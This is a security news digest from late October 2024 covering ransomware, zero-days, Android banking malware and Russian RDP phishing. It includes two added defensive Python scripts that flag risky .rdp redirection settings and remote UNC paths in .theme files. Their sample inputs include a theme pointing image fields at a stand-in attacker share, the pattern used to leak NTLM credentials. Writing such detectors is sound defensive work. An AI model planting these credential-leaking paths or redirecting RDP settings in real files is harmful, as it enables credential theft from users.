        Cybersecurity researchers have disclosed a new phishing kit that has been put to use in campaigns targeting Australia, Japan, Spain, the U.K., and the U.S. since at least September 2024. Netcraft said more than 2,000 phishing websites have been identified using the kit, known as Xiū gǒu, with the offering used in attacks aimed at a variety of verticals, such as public sectors, postal, digital services

        Autosummary: Netcraft said more than 2,000 phishing websites have been identified using the kit, known as Xiū gǒu, with the offering used in attacks aimed at a variety of verticals, such as public sectors, postal, digital services, and banking services.


        Microsoft Warns of Chinese Botnet Exploiting Router Flaws for Credential Theft

        exploits
        2024-11-01 https://thehackernews.com/2024/11/microsoft-warns-of-chinese-botnet.html
        Microsoft has revealed that a Chinese threat actor it tracks as Storm-0940 is leveraging a botnet called Quad7 to orchestrate highly evasive password spray attacks. The tech giant has given the botnet the name CovertNetwork-1658, stating the password spray operations are used to steal credentials from multiple Microsoft customers. "Active since at least 2021, Storm-0940 obtains initial access

        Autosummary: "Storm-0940 is known to target organizations in North America and Europe, including think tanks, government organizations, non-governmental organizations, law firms, defense industrial base, and others."


        Synology hurries out patches for zero-days exploited at Pwn2Own

        exploits
        2024-11-01 https://www.bleepingcomputer.com/news/security/synology-fixed-two-critical-zero-days-exploited-at-pwn2own-within-days/
        Synology, a Taiwanese network-attached storage (NAS) appliance maker, patched two critical zero-days exploited during last week's Pwn2Own hacking competition within days. [...]

        Autosummary: Synology says it addressed the vulnerabilities in the following software releases; however, they're not automatically applied on vulnerable systems, and customers are advised to update as soon as possible to block potential incoming attacks: BeePhotos for BeeStation OS 1.1: upgrade to 1.1.0-10053 or above; BeePhotos for BeeStation OS 1.0: upgrade to 1.0.2-10026 or above; Synology Photos 1.7 for DSM 7.2: upgrade to 1.7.0-0795 or above.


        LA housing authority confirms breach claimed by Cactus ransomware

        exploits ransomware
        2024-11-01 https://www.bleepingcomputer.com/news/security/la-housing-authority-confirms-breach-claimed-by-cactus-ransomware/
        The Housing Authority of the City of Los Angeles (HACLA), one of the largest public housing authorities in the United States, confirmed that a cyberattack hit its IT network after recent breach claims from the Cactus ransomware gang. [...]

        Autosummary: Before encrypting devices on the breached network on December 31, 2022, the attackers had access to HACLA members' sensitive personal information, including (but not limited to) names, social security numbers, contact information, driver's licenses, credit card and financial account numbers, as well as their health insurance and medical information.


        Ex-police officers jailed over Brazil politician's murder

        latam
        2024-11-01 https://www.bbc.com/news/articles/cd7neyw2459o
        Brazil's justice minister said the homicide was "evidently politically motivated".



        IoT needs more respect for its consumers, creations, and itself

        industry
        2024-10-31 https://www.helpnetsecurity.com/2024/10/31/connected-device-privacy/

        Yet again, connected devices are in the news for all the wrong reasons. In October, security researchers found that robot vacuums from Chinese company, Ecovacs, can be compromised via a backdoor. In one case, hackers gained control over the device and shouted slurs at the homeowners. Worse still: the company doesn’t take responsibility and tells users they “do not need to worry excessively” about the vulnerability. This hack is another unfortunate example of connected device … More

        The post IoT needs more respect for its consumers, creations, and itself appeared first on Help Net Security.


        Autosummary: But the implications are far more sinister – these always-connected, sensor-equipped devices could be used to eavesdrop on private conversations, stalk targets, or even conduct corporate intelligence gathering by scanning homes for products and brands. And yet, despite multiple high-profile stories, poor products with lax security are concerningly common, a clear danger with cameras and microphones in the mix. The smart home and office are, in essence, our personal and professional lives, and I’m certainly not comfortable with companies playing fast and loose with cybersecurity standards.


        LiteSpeed Cache Plugin Vulnerability Poses Significant Risk to WordPress Websites

        exploits
        2024-10-31 https://thehackernews.com/2024/10/litespeed-cache-plugin-vulnerability.html
        A high-severity security flaw has been disclosed in the LiteSpeed Cache plugin for WordPress that could allow an unauthenticated threat actor to elevate their privileges and perform malicious actions. The vulnerability, tracked as CVE-2024-50550 (CVSS score: 8.1), has been addressed in version 6.5.2 of the plugin. "The plugin suffers from an unauthenticated privilege escalation vulnerability

        Autosummary: However, a successful exploitation banks on the following plugin configuration: Crawler -> General Settings -> Crawler: ON; Crawler -> General Settings -> Run Duration: 2500 – 4000; Crawler -> General Settings -> Interval Between Runs: 2500 – 4000; Crawler -> General Settings -> Server Load Limit: 0; Crawler -> Simulation Settings -> Role Simulation: 1 (ID of user with administrator role).


        Sophos mounted counter-offensive operation to foil Chinese attackers

        industry
        2024-10-31 https://www.helpnetsecurity.com/2024/10/31/sophos-china-defensive-operation/

        Sophos conducted a defensive and counter-offensive operation over the last five years against multiple interlinked nation-state adversaries based in China targeting perimeter devices, including Sophos Firewalls. Espionage campaigns tied to Chinese hacking groups: The attackers used a series of campaigns with novel exploits and customized malware to embed tools to conduct surveillance, sabotage and cyberespionage, with tactics, tools and procedures (TTPs) overlapping those of well-known Chinese nation-state groups including Volt Typhoon, APT31 and APT41. The … More

        The post Sophos mounted counter-offensive operation to foil Chinese attackers appeared first on Help Net Security.


        Autosummary: Minimize internet-facing services and devices when possible; prioritize patching with urgency for internet-facing devices and monitor these devices; enable hotfixes for edge devices to be allowed and applied automatically; collaborate with law enforcement, public-private partners, and government to share and act on relevant IoCs; create a plan for how your organization deals with EOL devices. “We need to work collaboratively across the public and private sector, law enforcement and governments, and the security industry, to share what we know about these adversarial operations.” While they released details starting in 2020 on the campaigns associated, including Cloud Snooper and Asnarök, the company is sharing the overall investigation analysis to raise awareness of the persistence of Chinese nation-state adversaries and their hyperfocus on compromising perimeter, unpatched and end-of-life (EOL) devices, often via zero-day exploits they are creating for those devices. The adversaries targeted both small and large critical infrastructure and government targets, primarily located in South and South-East Asia, including nuclear energy suppliers, a national capital’s airport, a military hospital, state security apparatus, and central government ministries.


        Lottie Player supply chain compromise: Sites, apps showing crypto scam pop-ups

        financial
        2024-10-31 https://www.helpnetsecurity.com/2024/10/31/lottie-player-compromise/

        A supply chain compromise involving Lottie Player, a widely used web component for playing site and app animations, has made popular decentralized finance apps show pop-ups urging users to connect their wallets, TradingView has reported. [Figure: The pop-up (Source: Lottie Player GitHub repository)] Users who did it – and it seems that there was at least one victim – had their wallets drained. The Lottie Player compromise: Website admins began complaining about the pop-up and asking … More

        The post Lottie Player supply chain compromise: Sites, apps showing crypto scam pop-ups appeared first on Help Net Security.




        North Korean hackers pave the way for Play ransomware

        exploits ransomware
        2024-10-31 https://www.helpnetsecurity.com/2024/10/31/north-korean-hackers-play-ransomware/

        North Korean state-sponsored hackers – Jumpy Pisces, aka Andariel, aka Onyx Sleet – have been spotted burrowing into enterprise systems, then seemingly handing matters over to the Play ransomware group. [Figure: Timeline of the attack (Source: Palo Alto Networks)] The attack: The ransomware attack was investigated by Palo Alto Networks’ Unit 42 in September 2024, and they determined that North Korean hackers gained access to a host using a compromised user’s account, moved laterally to other … More

        The post North Korean hackers pave the way for Play ransomware appeared first on Help Net Security.




        Hackers target critical zero-day vulnerability in PTZ cameras

        exploits
        2024-10-31 https://www.bleepingcomputer.com/news/security/hackers-target-critical-zero-day-vulnerability-in-ptz-cameras/
        Hackers are attempting to exploit two zero-day vulnerabilities in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras used in industrial, healthcare, business conferences, government, and courtroom settings. [...]

        Autosummary: Later, GreyNoise discovered that at least two newer models, PT20X-SE-NDI-G3 and PT30X-SE-NDI-G3, which also didn't receive a patch, were impacted too.


        Windows 11 Task Manager bug shows wrong number of running processes

        exploits
        2024-10-31 https://www.bleepingcomputer.com/news/microsoft/windows-11-task-manager-bug-shows-wrong-number-of-running-processes/
        Microsoft is investigating a new Windows 11 issue that causes the Task Manager to say there are zero running apps and background processes. [...]



        LiteSpeed Cache WordPress plugin bug lets hackers get admin access

        exploits
        2024-10-31 https://www.bleepingcomputer.com/news/security/litespeed-cache-wordpress-plugin-bug-lets-hackers-get-admin-access/
        The free version of the popular WordPress plugin LiteSpeed Cache has fixed a dangerous privilege elevation flaw in its latest release that could allow unauthenticated site visitors to gain admin rights. [...]

        Autosummary: On October 17, the vendor, LiteSpeed Technologies, released a fix for CVE-2024-50550 in version 6.5.2 of the plugin, improving the hash value randomness and making brute-forcing them practically infeasible.


        Microsoft fixes Windows 10 bug causing apps to stop working

        exploits
        2024-10-31 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-10-bug-causing-apps-to-stop-working/
        Microsoft has fixed a known issue that prevents some apps launched from non-admin accounts from starting on Windows 10 22H2 systems after installing the September preview cumulative update. [...]



        Android malware FakeCall intercepts your calls to the bank

        financial exploits
        2024-10-31 https://www.malwarebytes.com/blog/news/2024/10/android-malware-fakecall-intercepts-your-calls-to-the-bank
        Android malware FakeCall can intercept calls to the bank on infected devices and redirect the target to the criminals.

        Autosummary: Likely without realizing, when the user gives the app permission to set it as the default call handler, the malware gains permission to intercept and manipulate both outgoing and incoming calls.


        Fraudsters exploit US General Election fever, FBI warns

        exploits
        2024-10-31 https://www.tripwire.com/state-of-security/fraudsters-exploit-us-general-election-fever-fbi-warns
        As the United States of America enters the final days of the race for the White House, the FBI has warned that fraudsters are using the presidential election campaign to scam citizens out of their savings and personal data. Read more in my article on the Tripwire State of Security blog.

        Autosummary: Fortunately, there are simple steps you can take to reduce the chances that you fall foul of such scams: Be wary of unexpected calls, text messages, emails, or surveys, especially if they ask for personal information.


        New LightSpy Spyware Version Targets iPhones with Increased Surveillance Tactics

        industry
        2024-10-31 https://thehackernews.com/2024/10/new-lightspy-spyware-version-targets.html
        Cybersecurity researchers have discovered an improved version of an Apple iOS spyware called LightSpy that not only expands on its functionality, but also incorporates destructive capabilities to prevent the compromised device from booting up. "While the iOS implant delivery method closely mirrors that of the macOS version, the post-exploitation and privilege escalation stages differ

        Autosummary: The plugins can capture a wide range of data, including Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, and SMS messages, as well as gather information from apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp.


        Threat actor says Interbank refused to pay the ransom after a two-week negotiation

        financial
        2024-10-31 https://securityaffairs.com/170431/data-breach/interbank-refused-to-pay-the-ransom.html
        Peruvian Interbank confirmed a data breach after threat actors accessed its systems and leaked stolen information online. Interbank, formally Banco Internacional del Perú Service Holding S.A.A., is a leading Peruvian provider of financial services with over 2 million customers. Interbank disclosed a data breach after a threat actor claimed the hack of the organization and leaked stolen […]



        QNAP fixed second zero-day demonstrated at Pwn2Own Ireland 2024

        exploits
        2024-10-31 https://securityaffairs.com/170423/security/qnap-fixed-second-zero-day-demonstrated-pwn2own-ireland-2024.html
        QNAP addressed the second zero-day vulnerability demonstrated by security researchers during the recent Pwn2Own Ireland 2024. Taiwanese manufacturer QNAP patched the second zero-day vulnerability, tracked as CVE-2024-50387, which was exploited by security researchers during the recent Pwn2Own Ireland 2024. The vulnerability is a SQL injection (SQLi) issue that impacts QNAP's SMB Service. The researcher YingMuo […]



        New version of Android malware FakeCall redirects bank calls to scammers

        financial exploits
        2024-10-31 https://securityaffairs.com/170410/malware/fakecall-malware-intercepts-outgoing-bank-calls.html
        The latest FakeCall malware version for Android intercepts outgoing bank calls, redirecting them to attackers to steal sensitive info and bank funds. Zimperium researchers spotted a new version of the FakeCall malware for Android that hijacks victims' outgoing calls and redirects them to the attacker's phone number. The malware allows operators to steal bank users' […]



        Huge fire engulfs shopping centre in Brazil

        latam
        2024-10-31 https://www.bbc.com/news/videos/c75lzpkp25eo
        There have been no reported fatalities, according to the fire department.



        Russia fines Google more money than there is in entire world

        financial
        2024-10-31 https://www.bbc.com/news/articles/cdxvnwkl5kgo
        The mind-boggling figure has been levied due to the company restricting Russian state media on YouTube.



        6 key elements for building a healthcare cybersecurity response plan

        ciber
        2024-10-30 https://www.helpnetsecurity.com/2024/10/30/healthcare-cybersecurity-incident-response-plan/

        Medical practices remain vulnerable to cyberattacks, with over a third unable to cite a cybersecurity incident response plan, according to Software Advice. This gap exposes healthcare providers to risks of patient data breaches, HIPAA violations, financial penalties, and patient safety concerns. The findings come at a critical time, as the Health Infrastructure Security and Accountability Act seeks to establish minimum cybersecurity standards across the healthcare industry. Software Advice’s survey found that 59% of medical practices … More

        The post 6 key elements for building a healthcare cybersecurity response plan appeared first on Help Net Security.

        Autosummary: “Downtime from a cyberattack can disrupt production, profits, and reputation for most businesses, but in healthcare, it means inaccessible medical records, malfunctioning devices, and delayed critical procedures,” said Lisa Morris, associate principal medical analyst at Software Advice.


        Russian hackers deliver malicious RDP configuration files to thousands

        rusia-ucrania
        2024-10-30 https://www.helpnetsecurity.com/2024/10/30/midnight-blizzard-spearphishing-rdp-file/

        Midnight Blizzard – a cyber espionage group that has been linked to the Russian Foreign Intelligence Service (SVR) – is targeting government, academia, defense, and NGO workers with phishing emails containing a signed Remote Desktop Protocol (RDP) configuration file. “Based on our investigation of previous Midnight Blizzard spear-phishing campaigns, we assess that the goal of this operation is likely intelligence collection,” Microsoft’s threat analysts say. Midnight Blizzard Midnight Blizzard (aka Cozy Bear, APT29, and UNC2452) … More

        The post Russian hackers deliver malicious RDP configuration files to thousands appeared first on Help Net Security.

        Autosummary: As the Ukrainian CERT team recently warned, running the malicious file will establish an outgoing RDP connection with the attackers' server, allowing the server access to disks, network resources, printers, COM ports, audio devices, the clipboard and other resources (including credentials) on the targets' computer, as well as put into place technical prerequisites for running third-party programs or scripts.
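        The resource hand-over described above is driven by ordinary settings inside the .rdp file, so a mail gateway or analyst can triage an attachment before anyone double-clicks it. The script below is an added example (not code from the article, Microsoft's report or CERT-UA): it parses the mstsc "key:type:value" format, flags the documented redirection settings that give the remote server the local disks, clipboard, printers, COM ports, smart cards and microphone, notes RemoteApp mode and the presence of a signature, and reports a connection target outside an allow-list. The sample file, its host name and the trusted-host suffix are constructed assumptions.

```python
"""Triage an .rdp connection file for settings that hand the remote server
access to local resources. Added example; not code from the article, Microsoft
or CERT-UA. Key names are the documented mstsc .rdp settings; the sample file,
its host and the trusted-host list are constructed for illustration."""
import re

# Redirection settings and the local resource each one exposes. The first group
# takes a string value (drivestoredirect: '*' = all drives, or 'C:;D:;DynamicDrives');
# the second group is integer flags where 1 enables the redirection.
STRING_REDIRECTS = {
    "drivestoredirect": "local disks",
    "devicestoredirect": "plug-and-play devices",
    "camerastoredirect": "cameras",
}
FLAG_REDIRECTS = {
    "redirectclipboard": "clipboard",
    "redirectprinters": "printers",
    "redirectcomports": "COM ports",
    "redirectsmartcards": "smart cards",
    "audiocapturemode": "microphone",
    "redirectwebauthn": "WebAuthn/passkeys",
}
# Hosts a user-launched .rdp file is allowed to reach (assumption; use the real
# list of jump hosts / Remote Desktop gateways).
TRUSTED_HOST_SUFFIXES = (".corp.example.com",)

_LINE = re.compile(r"^(?P<key>[^:]+):(?P<type>[isb]):(?P<value>.*)$")


def parse_rdp(text):
    """Return {key: value} for well-formed 'key:type:value' lines (i = int, s/b = str)."""
    settings = {}
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue  # blank or malformed line; mstsc ignores it as well
        key, typ, value = m.group("key").strip().lower(), m.group("type"), m.group("value").strip()
        if typ == "i":
            if not value.lstrip("-").isdigit():
                continue
            value = int(value)
        settings[key] = value
    return settings


def target_host(full_address):
    """Host part of 'full address' ('host', 'host:port' or '[v6addr]:port'), lower-cased."""
    addr = full_address.strip()
    if addr.startswith("[") and "]" in addr:
        return addr[1:addr.index("]")].lower()
    return addr.rsplit(":", 1)[0].lower() if ":" in addr else addr.lower()


def triage_rdp(text):
    """Return a list of human-readable findings; an empty list means nothing notable."""
    s = parse_rdp(text)
    findings = []
    host = target_host(s.get("full address", ""))
    if not host:
        findings.append("no 'full address' set")
    elif not host.endswith(TRUSTED_HOST_SUFFIXES):
        findings.append(f"connects to untrusted host {host}")
    exposed = [f"{label} ({s[key]})" for key, label in STRING_REDIRECTS.items()
               if isinstance(s.get(key), str) and s[key]]
    exposed += [label for key, label in FLAG_REDIRECTS.items() if s.get(key) == 1]
    if exposed:
        findings.append("redirects " + ", ".join(exposed))
    if s.get("remoteapplicationmode") == 1:
        findings.append(f"RemoteApp mode: server launches {s.get('remoteapplicationprogram', '')!r}")
    if s.get("signature"):
        # A signature only suppresses the 'unknown publisher' prompt; it says
        # nothing about whether the publisher should be trusted.
        findings.append(f"signed file (signscope={s.get('signscope', '')})")
    return findings


# Constructed sample modelled on the settings a resource-stealing file would set.
SAMPLE_RDP = """\
full address:s:rdp.example.net:3389
screen mode id:i:2
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectcomports:i:1
redirectsmartcards:i:1
audiocapturemode:i:1
remoteapplicationmode:i:1
remoteapplicationprogram:s:||Storage
signscope:s:Full Address,Drives To Redirect,Redirect Clipboard
signature:s:AQABAAEAAAA
"""

if __name__ == "__main__":
    for finding in triage_rdp(SAMPLE_RDP):
        print("-", finding)
```

        On the constructed sample this reports an untrusted target, every redirection the CERT warning lists, a RemoteApp launch and a signature; a benign file that only names an allow-listed jump host with redirections off yields no findings. Treat the signature check as informational: a valid signature from an unrelated certificate is exactly what makes such a file open without the usual prompts.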


        Google fixed a critical vulnerability in Chrome browser

        exploits
        2024-10-30 https://securityaffairs.com/170395/security/google-fixed-critical-chrome-flaw.html
        Google addressed a critical vulnerability in its Chrome browser, tracked as CVE-2024-10487, which was reported by Apple. Google has patched a critical Chrome vulnerability, tracked as CVE-2024-10487, reported by Apple Security Engineering and Architecture (SEAR) on October 23, 2024. The vulnerability is an out-of-bounds write issue that resides in the Dawn implementation. Dawn is an open-source […]



        QNAP fixed NAS backup zero-day demonstrated at Pwn2Own Ireland 2024

        exploits
        2024-10-30 https://securityaffairs.com/170386/uncategorized/qnap-fixed-zero-day-cve-2024-50388-pwn2own-ireland-2024.html
        QNAP fixed critical zero-day CVE-2024-50388 which was demonstrated against a TS-464 NAS device during the Pwn2Own Ireland 2024 competition. QNAP addressed a critical zero-day vulnerability, tracked as CVE-2024-50388, which was exploited by white hat hackers against a TS-464 NAS device during the recent Pwn2Own Ireland 2024 hacking competition. The flaw is an OS command injection […]



        Rescuers search for hotel collapse survivors in Argentina

        latam
        2024-10-30 https://www.bbc.com/news/articles/cy0l9jlge1eo
        The 10-storey hotel, in Villa Gesell, collapsed early on Tuesday, with one body found in the debris.

        Autosummary: The 10-storey Dubrovnik hotel, in the coastal city of Villa Gesell, collapsed early on Tuesday, with a local describing the scene as resembling a "horror movie".


        QNAP patches second zero-day exploited at Pwn2Own to get root

        exploits
        2024-10-30 https://www.bleepingcomputer.com/news/security/qnap-patches-second-zero-day-exploited-at-pwn2own-to-get-root/
        QNAP has fixed a second zero-day vulnerability exploited at the Pwn2Own Ireland 2024 hacking contest to gain a root shell and take over a TS-464 NAS device. [...]



        North Korean govt hackers linked to Play ransomware attack

        exploits ransomware
        2024-10-30 https://www.bleepingcomputer.com/news/security/north-korean-govt-hackers-linked-to-play-ransomware-attack/
        The North Korean state-sponsored hacking group tracked as "Andariel" has been linked to the Play ransomware operation, using the RaaS to work behind the scenes and evade sanctions. [...]

        Autosummary: However, this led the threat actors to frequently rebrand under different names, like WastedLocker, Hades, Phoenix CryptoLocker, PayLoadBin, and Macaw, to evade sanctions.


        Android malware "FakeCall" now reroutes bank calls to attackers

        financial exploits
        2024-10-30 https://www.bleepingcomputer.com/news/security/android-malware-fakecall-now-reroutes-bank-calls-to-attackers/
        A new version of the FakeCall malware for Android hijacks outgoing calls from a user to their bank, redirecting them to the attacker's phone number instead. [...]

        Autosummary: A new phone listener service establishes a communication channel with the attacker's command and control (C2) server, allowing them to issue commands to perform various actions, like get device location, delete apps, record audio or video, and edit contacts. [Figure: Overview of latest FakeCall attacks (Source: Zimperium)] New features and improvements: Despite heavier code obfuscation, Zimperium also discovered that the latest FakeCall versions add several improvements and attack mechanisms, though some are still under development.


        XM Cyber Vulnerability Risk Management boosts prioritization with actual impact analysis

        exploits
        2024-10-30 https://www.helpnetsecurity.com/2024/10/30/xm-cyber-vulnerability-risk-management/

        XM Cyber launched its innovative Vulnerability Risk Management (VRM) solution, extending its Continuous Exposure Management Platform. This new approach to vulnerability management empowers organizations to see through the fog of false positives left behind by legacy vulnerability assessment tools and confidently embrace an innovative new security methodology. XM Cyber’s Vulnerability Risk Management provides an approach to discover, quantify, and reduce the risk presented by common vulnerabilities. By correlating CVE-related risk attributes with real-world attack techniques … More

        The post XM Cyber Vulnerability Risk Management boosts prioritization with actual impact analysis appeared first on Help Net Security.

        Autosummary: The key capabilities of XM Cyber's Vulnerability Risk Management include: Prioritizing high-impact risks: Organizations can now focus on vulnerabilities that present the greatest risk to the business with contextualized views that allow prioritization based on various risk attributes and threat context, from exploit likelihood to business impact risk.


        Ransomware hits web hosting servers via vulnerable CyberPanel instances

        exploits
        2024-10-30 https://www.helpnetsecurity.com/2024/10/30/vulnerable-cyberpanel-psaux-ransomware/

        A threat actor – or possibly several – has hit approximately 22,000 vulnerable instances of CyberPanel and encrypted files on the servers running it with the PSAUX and other ransomware. [Figure: The PSAUX ransom note (Source: LeakIX)] The CyberPanel vulnerabilities: CyberPanel is a widely used open-source control panel for managing web-hosting servers. Two critical command injection vulnerabilities (CVE-2024-51378 and CVE-2024-51567) affecting CyberPanel versions 2.3.6 and (unpatched) 2.3.7 have been publicly documented … More

        The post Ransomware hits web hosting servers via vulnerable CyberPanel instances appeared first on Help Net Security.



        North Korean Group Collaborates with Play Ransomware in Significant Cyber Attack

        exploits ransomware
        2024-10-30 https://thehackernews.com/2024/10/north-korean-group-collaborates-with.html
        Threat actors in North Korea have been implicated in a recent incident that deployed a known ransomware family called Play, underscoring their financial motivations. The activity, observed between May and September 2024, has been attributed to a threat actor tracked as Jumpy Pisces, which is also known as Andariel, APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy,

        Autosummary: The activity, observed between May and September 2024, has been attributed to a threat actor tracked as Jumpy Pisces, which is also known as Andariel, APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy, Silent Chollima, and Stonefly.


        Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware

        exploits
        2024-10-30 https://thehackernews.com/2024/10/malvertising-campaign-hijacks-facebook.html
        Cybersecurity researchers have uncovered an ongoing malvertising campaign that abuses Meta's advertising platform and hijacked Facebook accounts to distribute an information stealer known as SYS01stealer. "The hackers behind the campaign use trusted brands to expand their reach," Bitdefender Labs said in a report shared with The Hacker News. "The malvertising campaign leverages nearly a hundred malicious

        Autosummary: The primary vector through which SYS01stealer is distributed is via malvertising across platforms like Facebook, YouTube, and LinkedIn, with the ads promoting Windows themes, games, AI software, photo editors, VPNs, and movie streaming services. "Because the email is sent via Eventbrite's verified domain and IP address, it is more likely to pass email filters, successfully reaching the recipient's inbox," Perception Point said.


        Interbank confirms data breach following failed extortion, data leak

        financial
        2024-10-30 https://www.bleepingcomputer.com/news/security/interbank-confirms-data-breach-following-failed-extortion-data-leak/
        Interbank, one of Peru's leading financial institutions, has confirmed a data breach after a threat actor who hacked into its systems leaked stolen data online. [...]

        Autosummary: [Figure: Stolen Interbank data up for sale (BleepingComputer)] The threat actor claims they were able to steal Interbank customers' full names, account IDs, birth dates, addresses, phone numbers, email addresses, and IP addresses, as well as credit card and CVV numbers, credit card expiry dates, info on bank transactions, and other sensitive information, including plaintext credentials.


        Russia-linked Midnight Blizzard APT targeted 100+ organizations with a spear-phishing campaign using RDP files

        financial
        2024-10-30 https://securityaffairs.com/170398/apt/midnight-blizzard-apt-targeted-100-organizations.html
        Microsoft warns of a new phishing campaign by Russia-linked APT Midnight Blizzard targeting hundreds of organizations. Microsoft warns of a large-scale spear-phishing campaign by Russia-linked APT Midnight Blizzard (aka APT29, SVR group, BlueBravo, Cozy Bear, Nobelium, and The Dukes), targeting 1,000+ users across 100+ organizations for intelligence gathering. The Midnight Blizzard group along with APT28 cyber espionage group was involved in the Democratic National […]



        Argentina's Milei fires foreign minister for opposing US embargo on Cuba

        latam
        2024-10-30 https://www.bbc.com/news/articles/cgl4y6w2r33o
        President Javier Milei fires Diana Mondino after Argentina backs lifting the US economic embargo on Cuba at the UN.



        Cybersecurity jobs available right now: October 29, 2024

        ciber
        2024-10-29 https://www.helpnetsecurity.com/2024/10/29/cybersecurity-jobs-available-right-now-october-29-2024/

        API Gateway Security Engineer | Ness Technologies | Israel | Hybrid: As an API Gateway Security Engineer, you will be responsible for managing and implementing API Gateway solutions with a strong focus on information security. Your responsibilities will include ongoing maintenance of API systems, managing secure permissions and access, monitoring API traffic to identify anomalies, threats, and intrusion attempts, and collaborating with security and infrastructure teams to identify and manage security risks, … More

        The post Cybersecurity jobs available right now: October 29, 2024 appeared first on Help Net Security.

        Autosummary:
        Senior Cybersecurity Architect | Kyndryl | France | Hybrid: As a Senior Cybersecurity Architect, you will design the integration of various security technologies, including EDR, SIEM, and DLP solutions, within complex IT environments spanning on-premises, cloud, and hybrid infrastructures.
        Network Security Engineer | DRW | United Kingdom | On-site: As a Network Security Engineer, you will architect, troubleshoot, and implement firewalls, intrusion detection/prevention systems (IDPS), and VPN concentrators into new or existing networks.
        Senior Security Engineer, Firmware | Roku | United Kingdom | On-site: As a Senior Security Engineer, Firmware, you will develop new product solutions for cryptographic key programming, secure boot, and secure enclave.


        The state of password security in 2024

        government
        2024-10-29 https://www.helpnetsecurity.com/2024/10/29/password-health-scores-video/

        In this Help Net Security video, John Bennett, CEO at Dashlane, discusses their recent Global Password Health Score Report, detailing the global state of password health and hygiene. Poor security habits like password reuse remain widespread. With passwordless technologies like passkeys still in their early stages of adoption, organizations must remain vigilant. The risk of weak, reused, and compromised passwords fuels credential-based breaches, underscoring the need for stronger password management practices even as new technologies … More

        The post The state of password security in 2024 appeared first on Help Net Security.



        U.S. Government Issues New TLP Guidance for Cross-Sector Threat Intelligence Sharing

        government
        2024-10-29 https://thehackernews.com/2024/10/us-government-issues-new-tlp-guidance.html
        The U.S. government (USG) has issued new guidance governing the use of the Traffic Light Protocol (TLP) to handle the threat intelligence information shared between the private sector, individual researchers, and Federal Departments and Agencies. "The USG follows TLP markings on cybersecurity information voluntarily shared by an individual, company, or any other organization, when not in



        New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors

        exploits
        2024-10-29 https://thehackernews.com/2024/10/new-research-reveals-spectre.html
        More than six years after the Spectre security flaw impacting modern CPU processors came to light, new research has found that the latest AMD and Intel processors are still susceptible to speculative execution attacks. The attack, disclosed by ETH Zürich researchers Johannes Wikner and Kaveh Razavi, aims to undermine the Indirect Branch Predictor Barrier (IBPB) on x86 chips, a crucial mitigation

        Autosummary: It's used as a way to help counter Branch Target Injection (BTI), aka Spectre v2 (CVE-2017-5715), a cross-domain transient execution attack (TEA) that takes advantage of indirect branch predictors used by processors to cause a disclosure gadget to be speculatively executed.


        Patching problems: The “return” of a Windows Themes spoofing vulnerability

        exploits
        2024-10-29 https://www.helpnetsecurity.com/2024/10/29/windows-themes-spoofing-vulnerability/

        Despite two patching attempts, a security issue that may allow attackers to compromise Windows users' NTLM (authentication) credentials via a malicious Windows themes file still affects Microsoft's operating system, 0patch researchers have discovered. The path to discovery: The story starts with CVE-2024-21320, a Windows Themes spoofing vulnerability that was reported by Akamai security researcher Tomer Peled and fixed by Microsoft in January 2024. The vulnerability could be triggered by a .theme file that specified a … More

        The post Patching problems: The “return” of a Windows Themes spoofing vulnerability appeared first on Help Net Security.

        Autosummary: Getting a user to view a theme file in Windows Explorer, on the other hand, may be a simple matter of forcing a download of the theme file while the user is on the attacker's web page, then waiting for the user to open the Downloads folder (depending on the view type of the Downloads folder).” In addition, for a credentials leak to occur on a server it's not enough just to view a theme file in Windows Explorer or on the desktop; rather, the theme file needs to be double-clicked and the theme thus applied,” 0patch researchers explained.
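        Whether the leak needs a folder view or a double-click, it starts with a theme whose resource fields name a remote host, so the file itself can be checked before it reaches a desktop. The script below is an added example, not code from 0patch, Akamai or Microsoft; it assumes that an image field (BrandImage, Wallpaper and the like) pointing at a remote host makes Windows fetch the file over SMB and authenticate with the user's NTLM credentials, which is the leak the article describes. It parses the INI layout of a .theme file with the standard library and reports every value that names a remote host; it also catches the forward-slash UNC form and file:// URLs, which goes beyond the single case in the article. The sample theme and the host name are constructed.

```python
"""Find remote resource references in a Windows .theme file. Added example, not
code from 0patch, Akamai or Microsoft. Assumes that an image field (BrandImage,
Wallpaper, ...) pointing at a remote host makes Windows fetch it over SMB and
authenticate with the user's NTLM credentials; the sample theme and the host
name are constructed."""
import configparser
import re

# UNC path (\\host\share\...), its forward-slash form (//host/share/...) or a
# file://host/... URL: each names a host the SMB client will reach out to.
_REMOTE = re.compile(
    r"^(?:\\\\|//)(?P<host>[^\\/]+)[\\/]|^file://(?P<fhost>[^/]+)/", re.IGNORECASE
)


def parse_theme(text):
    """.theme files are INI: '[Section]' headers, 'Key=Value' lines, ';' comments."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.optionxform = str  # keep key spelling (BrandImage, Wallpaper) as written
    cp.read_string(text)
    return cp


def remote_references(text):
    """Return [(section, key, host)] for every value that points at a remote host."""
    cp = parse_theme(text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            m = _REMOTE.match((value or "").strip())
            if m:
                hits.append((section, key, (m.group("host") or m.group("fhost")).lower()))
    return hits


# Constructed sample: the usual theme sections, with two image paths on a
# remote share (placeholder host) of the kind the leak depends on.
SAMPLE_THEME = r"""; constructed sample theme
[Theme]
DisplayName=Quarterly report
BrandImage=\\files.attacker.example\share\brand.png

[Control Panel\Desktop]
Wallpaper=\\files.attacker.example\share\wall.jpg
Pattern=

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor

[MasterThemeSelector]
MTSM=DABJDKT
"""

if __name__ == "__main__":
    for section, key, host in remote_references(SAMPLE_THEME):
        print(f"[{section}] {key} -> {host}")
```

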